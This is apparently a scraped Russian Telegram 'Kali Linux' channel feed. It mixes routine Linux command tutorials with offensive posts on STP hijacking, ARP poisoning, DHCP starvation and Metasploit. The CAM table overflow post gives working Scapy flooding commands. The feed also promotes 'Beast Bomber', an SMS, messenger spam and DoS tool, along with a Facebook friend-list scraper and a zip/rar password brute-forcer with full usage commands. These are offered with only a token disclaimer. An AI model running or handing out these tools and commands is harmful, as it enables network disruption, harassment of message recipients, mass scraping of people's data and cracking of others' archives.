Kali Linux
32.8K subscribers
552 photos
13 videos
12 files
656 links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl - 🐍

@ArtificialIntelligencedl - AI
Download Telegram
💻 Используем STP Root Hijacking для перехвата трафика

При атаке на каналь­ном уров­не, можно переп­рыгнуть через все средс­тва защиты, нас­тро­енные на более высоких уров­нях. В данной статье мы с вами рассмотрим один из векторов атак на этот самый низ­кий уро­вень сети — перехват трафика с помощью STP Root Hijacking.

Для понимания этого материала нужно иметь бэкграунд знаний компьютерных сетей, в частности знать как работает коммутация и маршрутизация.


Читть дальше

@linuxkalii
Для поиска файлов в Linux служит команда find. Это довольно сильная утилита со сложным синтаксисом.

Мощность команды find заключается во множестве самых разных параметров поиска, которые из-за их количества не так-то просто запомнить. К тому же find может выполнять операции над найденными файлами. Например, вы можете найти временные файлы и сразу удалить их.

Несколько примеров использования этой команды:

найти файлы с именем a.out (точнее, в имени которых содержится строка «a.out»), поиск начать с корневого каталога (/):
find / -name a.out

найти файлы по маске *. txt:
find / -name '*.txt'

найти файлы нулевого размера, поиск начать с текущего каталога (.):
find . -size 0с
Кстати, для поиска пустых файлов намного проще использовать параметр -empty:
find . -empty

найти файлы, размер которых от 100 до 150 Мбайт, поиск производить в домашнем каталоге и всех его подкаталогах:
find ~ -size +100М -size -150М

найти все временные файлы и удалить их (для каждого найденного файла будет запущена команда rm):
find / -name *.tmp -ok rm {} \

Вместо параметра -ok можно использовать параметр -ехес, который также запускает указанную после него команду, но не запрашивает подтверждение выполнения этой команды для каждого файла.

Подробнее

@linuxkalii
📲 Сетевая разведка и перехват трафика с помощью ARP

При пентесте канального уровня важной частью является сетевая разведка. В сегодняшней статье поговорим о технике сетевой разведке (ARP Harvesting) и перехвате трафика с помощью ARP (ARP Cache Poisoning).

Сетевая разведка и перехват трафика с помощью ARP
ARP Harvesting
Про­токол ARP может быть очень полезен в рам­ках сетевой раз­ведки. Ска­ниро­вание ARP поз­воля­ет про­вес­ти перечис­ление активных хос­тов и име­ет неболь­шое пре­иму­щес­тво перед ICMP-ска­ниро­вани­ем, пос­коль­ку тра­фик ICMP в кор­поратив­ной сети может быть огра­ничен, а то и вов­се вык­лючен.

Проб­лема ска­ниро­вания ARP в том, что это очень шум­ный спо­соб сетевой раз­ведки. С этим спо­собом нуж­но быть осто­рож­ным, что­бы не спро­воци­ровать тре­вогу сис­тем безопас­ности IPS/IDS. Да и на пор­те, к которо­му ты под­клю­чен, может быть скон­фигури­рован Storm Control, бло­киру­ющий порт при ано­маль­ном широко­веща­тель­ном тра­фике (тра­фик про­токо­ла ARP — широко­веща­тель­ный).

C помощью ARPScanner.py можем обна­ружить активные хос­ты в сети 10.1.1.0/24 и их MAC-адре­са. В моем слу­чае тес­товая сеть малень­кая, но тем не менее.

c0ldheim@PWN:~$ sudo python3 ARPScanner.py -t 10.1.1.0/24 -i eth0

Подробнее

@linuxkalii
☠️ Kali Linux Tutorial – Linux Гайд

Kali Linux. (Это написано на главной странице Kali.org в самом верху страницы.) Что вы получаете из этого утверждения? Вы заметили это: APTD (Распространение расширенного тестирования на проникновение)? Здесь буквально нет термина «взлом». Kali Linux такой же, как и другие дистрибутивы Linux. Проще говоря, это дистрибутив Linux, наполненный инструментами безопасности и ориентированный на экспертов по сетевой и компьютерной безопасности. Однако использование Kali Linux сосредоточено только на безопасности и криминалистике.

Читать дальше

@linuxkalii
Работа с каталогами 

mkdir <каталог> Создание каталога
cd <каталог> Изменение каталога
ls <каталог> Вывод содержимого каталога
rmdir <каталог> Удаление пустого каталога
rm -r <каталог> Рекурсивное удаление каталога

При указании имени каталога можно использовать следующие символы:

. — означает текущий каталог. Если вы введете команду cat ./file, то она выведет файл file, который находится в текущем каталоге;

.. — родительский каталог. Например, команда cd .. переведет вас на один уровень вверх по дереву файловой системы;

~ — домашний каталог пользователя.

Больше команд

@linuxkalii
Beast Bomber💥 - многофункциональный бомбер на Python

Возможности:

🌵 SMS рассыльщик (работает лучше с proxy)

🌵 Email рассыльщик

🌵 WhatsApp рассыльщик

🌵 Discord рассыльщик

🌵 Telegram рассыльщик

🌵 DoS

Инструкция на русском/английском:

⚙️ GitHub

⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.

Дальше

@linuxkalii
Forwarded from Python RU
🔥 Полезные библиотеки Python. Facebook Friend List Scraper

Facebook Friend List Scraper - OSINT инструмент для сбора имен и никнеймов пользователей из больших списков друзей Facebook без ограничения скорости.

📝 Статья

⚙️ GitHub/Инструкция

@pro_python_code
🖇Что делает CMP в Linux?


Команда cmp в Linux / UNIX используется для побайтного сравнения двух файлов и помогает определить, идентичны ли эти два файла или нет.

В чем разница между diff и cmp в Unix?
diff означает разницу. Эта команда используется для отображения различий в файлах путем сравнения файлов построчно. В отличие от других участников, cmp и comm, он сообщает нам какие строки в одном файле нужно изменить, чтобы два файла одинаковые.

В чем разница между командами comm и cmp в Linux?
Различные способы сравнения двух файлов в Unix

# 1) cmp: эта команда используется для посимвольного сравнения двух файлов. Пример: добавить разрешение на запись для пользователя, группы и других для file1. # 2) comm: используется эта команда сравнить два отсортированных файла.

В чем разница между командой common и cmp?
команда diff используется для преобразования одного файла в другой, чтобы сделать их идентичными, а comm используется для отображения общих элементов в обоих файлах. Объяснение: команда cmp по умолчанию отображает только первое несоответствие, которое встречается в обоих файлах.

Какой параметр используется с командой cmp для ограничения количества сравниваемых байтов?
5. Как ограничить количество байтов для сравнения. Инструмент также позволяет вам ограничить количество байтов, которые вы хотите сравнить - например, вы можете сравнить не более 25 или 50 байтов. Это можно сделать с помощью -n параметр командной строки.

Как вы используете cmp?
Когда cmp используется для сравнения двух файлов, он сообщает на экран о местоположении первого несоответствия, если разница обнаружена и если разница не обнаружена, то есть сравниваемые файлы идентичны. cmp не отображает сообщения и просто возвращает подсказку, если сравниваемые файлы идентичны.

Как я могу сравнить два файла в Linux?
Сравнение файлов (команда diff)

Чтобы сравнить два файла, введите следующее: diff chap1.bak chap1. Это отображает различия между chap1. …
Чтобы сравнить два файла, игнорируя различия в количестве пробелов, введите следующее: diff -w prog.c.bak prog.c.
Почему мы используем chmod в Linux?
Команда chmod (сокращение от режима изменения): используется для управления правами доступа к файловой системе в Unix и Unix-подобных системах. Существует три основных разрешения или режима файловой системы для файлов и каталогов: чтение (r)

Подробнее

@linuxkalii
Forwarded from Python RU
🔥 CompressedCrack Python скрипт для подбора паролей к zip и rar архивам.

CompressedCrack - простой и эффективный скрипт для подбора паролей к zip и rar архивам.

Установка:
$ git clone https://github.com/thanhminh6996/CompressedCrack.git

$ cd ./CompressedCrack

Использование:
Нас интересует скрипт crack.py который принимает несколько параметров:

$ python crack.py -i file_name min_character max_character characters

🌵 -i file_name : путь до архива.
🌵 min_character: минимальное количество символов в пароле.
🌵 max_character: максимальное количество символов в пароле.
🌵 characters: используемые в пароле символы по которым будет осуществляться перебор, 123qwerty!@$ и т.д.

$ python crack.py -i file.zip 1 5 1234567890

⚙️ GitHub/Инструкция

@pro_python_code
📍 ЛУЧШИЕ МОДИФИЦИРОВАННЫЕ ЯДРА LINUX

Ядро Linux – это основа любого дистрибутива, а учитывая их количество, нет ничего удивительного в том, что разработчики модифицируют его под себя. Большая часть дистрибутивов содержит патчи для лучшей совместимости со своими компонентами.

Есть и такие ядра, которые также модифицируют, но при этом не привязывают к определённому дистрибутиву. О таких ядрах и пойдёт речь. Одни из них повышают производительность, другие снижают задержки, третьи нацелены на высокий уровень безопасности. В этой статье мы собрали самые интересные модифицированные ядра Linux.

Ядро pf-kernel содержит в себе несколько значимых патчей. Вот некоторые из них:

патч для лучшей работы компилятора GCC;
патч против утечек памяти;
патч для создания виртуальных видеоустройств (полезно при проведении стримов);
патч BBR для эффективной обработки пакетов TCPи множество других более мелких улучшений.

Ядро примечательно тем, что имеются сборки для различных архитектур процессоров. Конечно, большой прибавки производительности это не даст, но на некоторых ноутбуках такое ядро позволит более эффективно использовать энергосберегающие функции.

Ядро XanMod во многом похоже на pf-kernel, но содержит даже большее количество патчей. Многие из них направлены на повышение производительности слоёв совместимости Wine и Anbox. Это ядро может быть полезно любителям игр. Прирост кадров в секунду в некоторых играх превышает 10%, что может существенно повысить комфорт в игре.

Читать дальше


@linuxkalii
КОМАНДА SU LINUX
Команда имеет следующий синтаксис:

su [options] [-] [user]

Если вызов команды происходит без аргументов, то происходит смена пользователя оболочки shell на суперпользователя root. Программа выдаст приглашение ввода пароля, если пароль будет верным, то текущим пользователем станет root.

options — некоторые дополнительные возможности команды. Мы их рассмотрим ниже:
[-] — смена контекста выполнения оболочки на контекст указанного пользователя. Переменные $PATH, $HOME, $SHELL, $USER, $LOGNAME содержат значения, характерные для указанного пользователя. Домашняя папка пользователя меняется на другую.
user — имя пользователя, под которым продолжит работать командная оболочка.
Основные опции команды su:

-c, --command=command — запускает приложение под указанным аккаунтом;
-s, --shell=shell — происходит запуск для заданного пользователя указанной оболочки;
-, -l, --login — смена контекста выполнения на контекст заданного пользователя, аналогична смене пользователя системы для shell;
-g, --group=group — вызов пользователя, состоящего в заданной группе. Используется только для пользователя root;
-h, --help — вызов справки для команды.
Далее давайте рассмотрим примеры работы с утилитой su.

ПРИМЕРЫ ИСПОЛЬЗОВАНИЯ SU
Смена пользователя на суперпользователя root, без смены окружения оболочки:

su

Обратите внимание, что здесь вам нужно набрать пароль не своего пользователя, а именно того, от имени которого вы хотите авторизоваться. В данном случае, пользователя root. Если вы получаете ошибку сбой при проверке подлинности su linux, то это может означать, что либо вы ввели пароль неверно, либо пароль для этого пользователя не задан. Такое можно встретить у пользователя root в Ubuntu и Linux Mint. Информацию о том как установить пароль вы можете найти в этой статье. Смена пользователя на суперпользователя root со сменой параметров окружения оболочки:

su - Смена пользователя на пользователя user01:

@linuxkalii
Использование атаки CAM Table Overflow в пентесте

Атака CAM Table Overflow
Иног­да такая ата­ка называ­ется перепол­нени­ем таб­лицы MAC-адре­сов. Прин­цип этой ата­ки сос­тоит в том, что­бы выз­вать перепол­нение ком­мутаци­онной мат­рицы. В слу­чае чего ком­мутатор, гру­бо говоря, прев­раща­ется в хаб и начина­ет рас­сылать пос­тупа­ющие кад­ры во все пор­ты, что вызыва­ет иде­аль­ные усло­вия для перех­вата тра­фика.

Вызывать перепол­нение очень прос­то, ведь у ком­мутато­ров огра­ничен раз­мер таб­лиц MAC-адре­сов. При запол­нении таб­лицы MAC-адре­сов зло­умыш­ленник смо­жет видеть все рас­сыла­емые кад­ры из всех пор­тов.

CAM Table Overflow
Вос­поль­зуем­ся Scapy, что­бы про­вес­ти такую ата­ку. В качес­тве MAC-адре­са источни­ка пусть будет ран­домизи­рован­ный MAC-адрес, каж­дый новый генери­рующий­ся кадр будет с новым MAC-адре­сом. MAC-адре­сов наз­начения это тоже каса­ется.

Да­лее с помощью метода sendp выпол­няем рас­сылку фик­тивных кад­ров Ethernet. Задав loop = 1, зацик­лим отправ­ку этих кад­ров.


>>> malicious_frames = Ether(src=RandMAC(), dst=RandMAC())
>>> sendp(malicious_frames, iface="eth0", loop=1, verbose=1)


Дамп тра­фика в момент про­веде­ния ата­ки
Таб­лица MAC-адре­сов ком­мутато­ра до ата­ки:

CoreSW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 3
Static Address Count : 0
Total Mac Addresses : 3

Total Mac Address Space Available: 7981
Таб­лица MAC-адре­сов ком­мутато­ра пос­ле ата­ки:

CoreSW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 7981
Static Address Count : 0
Total Mac Addresses : 7981


Total Mac Address Space Available: 7981

По­ка таб­лица MAC-адре­сов не запол­нена, ком­мутатор будет переда­вать все кад­ры из всех пор­тов, исполь­зуя широко­веща­тель­ную рас­сылку.

Статья

@linuxkalii
This media is not supported in your browser
VIEW IN TELEGRAM
Danger_Linux - сообщество для всех причастных и неравнодушных к поддержке сетевой и серверной инфраструктуры, пользовательской поддержке.

А еще пристанище мемов и анекдотов по DevOps⚙️, Linux🐧, Docker🚢 Kubernetes и инфобезу☁️

👇🏻Не расстраивай пингвина, подписывайся👇🏻
Истощение и подмена DHCP-сервера

DHCP Starvation
Эта ата­ка осно­вана на про­веде­нии рас­сылок огромно­го количес­тва сооб­щений DHCPDISCOVER с целью исто­щить адресное прос­транс­тво на сер­вере DHCP
. Сер­вер DHCP будет реаги­ровать на каж­дый зап­рос и выдавать IP-адрес. Пос­ле перепол­нения допус­тимого адресно­го прос­транс­тва сер­вер DHCP боль­ше не смо­жет обслу­живать новых кли­ентов в сво­ей сети, выдавая им IP-адре­са.

Читать дальше

@linuxkalii
Журналируемая файловая система имеет три режима работы:
journal, ordered и writeback.

Первый режим самый медленный, но он позволяет минимизировать потери ваших данных в случае сбоя системы или отключения питания. В режиме journal в системный журнал записывается все, что только можно, и это позволяет максимально восстановить файловую систему в случае сбоя.

В последовательном режиме (ordered) в журнал заносится информация только об изменении метаданных (служебных данных файловой системы). Этот режим используется по умолчанию и является компромиссным вариантом между производи тельностью и отказоустойчивостью.

Самым быстрым является режим обратной записи (writeback). Но особого толку от него не будет. Проще тогда уже при установке Linux выбрать файловую систему ext2 вместо ext3/ext4.

Если отказоустойчивость для вас на первом месте — выбирайте режим journal, во всех остальных случаях лучше выбрать ordered. Выбор режима осуществляется редактированием файла /etc/fstab. Например,

# режим ordered используется по умолчанию,
# поэтому ничего указывать не нужно
/dev/sdal / ext3 defaults 1 0
# на этом разделе важные данные, используем режим journal
/dev/sda2 /var ext3 data=journal 1 0
# здесь ничего важного нет, режим writeback
/dev/sda2 /opt ext3 data=writeback 0 0

После изменения этого файла выполните команду:
# mount -а
Она заново смонтирует все файловые системы, чтобы изменения вступили в силу.


@linuxkalii
ТОП-25 ЛУЧШИХ ИНСТРУМЕНТОВ KALI LINUX - Linux Hint

Я считаю, что Metasploit Framework - ЛУЧШИЙ ИНСТРУМЕНТ в KALI LINUX. У Metasploit много модулей:

Эксплойт - это метод, с помощью которого злоумышленник использует уязвимость в системе, службе, приложении и т. Д. Злоумышленник обычно использует это, чтобы что-то сделать с конкретной системой / службой / приложением, которое он / она атакует, чего разработчик / разработчик никогда не намеревался делать. Вроде как злоупотребление. Это то, что злоумышленник использует для получения доступа к системе.

Эксплойты всегда сопровождаются полезными нагрузками

Полезная нагрузка
Полезная нагрузка - это фрагмент кода, который выполняется в успешно эксплуатируемой системе. После успешной работы эксплойта платформа внедряет полезную нагрузку через эксплуатируемую уязвимость и заставляет ее запускать ее в целевой системе. Таким образом, злоумышленник попадает внутрь системы или может получить данные из скомпрометированной системы, используя полезную нагрузку.

Энкодеры
Кодеры используются для обфускации модулей, чтобы избежать обнаружения механизмом защиты, таким как антивирус или брандмауэр. Это широко используется при создании бэкдора. Бэкдор кодируется (даже несколько раз) и отправляется жертве.

Читать дальше

@linuxkalii
Тестирование на проникновение MSSQL

Эта шпаргалка предназначена для Red Teamers и пентестеров. Она разработан таким образом, что новички могут понять основы, а профессионалы могут освежить свои навыки с помощью расширенных опций.

https://github.com/Ignitetechnologies/MSSQL-Pentest-Cheatsheet

@linuxkalii
📝 РЕГУЛЯРНЫЕ ВЫРАЖЕНИЯ В LINUX

Интересным вопросом в Linux системах, является управление регулярными выражениями. Это полезный и необходимый навык не только профессионалам своего дела, системным администраторам, но, а также и обычным пользователям линуксоподобных операционных систем. В данной статье я постараюсь раскрыть, как создавать регулярные выражения и как их применять на практике в каких-либо целях. Основной областью применение регулярных выражений является поиск информации и файлов в линуксоподобных операционных системах.

Для работы в основном используются следующие символы:

"\text" - слова начинающиеся с text
"text/" - слова, заканчивающиеся на text
"^" - начало строки
"$" - конец строки
"a-z" - диапазон от a до z
"[^t]" - не буква t
"\[" - воспринять символ [ буквально
"." - любой символ
"a|z" - а или z
Регулярные выражения в основном используются со следующими командами:

grep - утилита поиска по выражению
egrep - расширенный grep
fgrep - быстрый grep
rgrep - рекурсивный grep
sed - потоковый текстовый редактор.

https://wiki.merionet.ru/servernye-resheniya/78/regulyarnye-vyrazheniya-v-linux/

@linuxkalii
bauh(ba-oo) – Графический интерфейс для менеджинга ваших Linux приложений/пакетов

Собирает все пакетные мененджеры в один интерфейс - среди них AUR, Flatpak, Snap и др.

@linuxkalii #Python #Linux #Useful #Interesting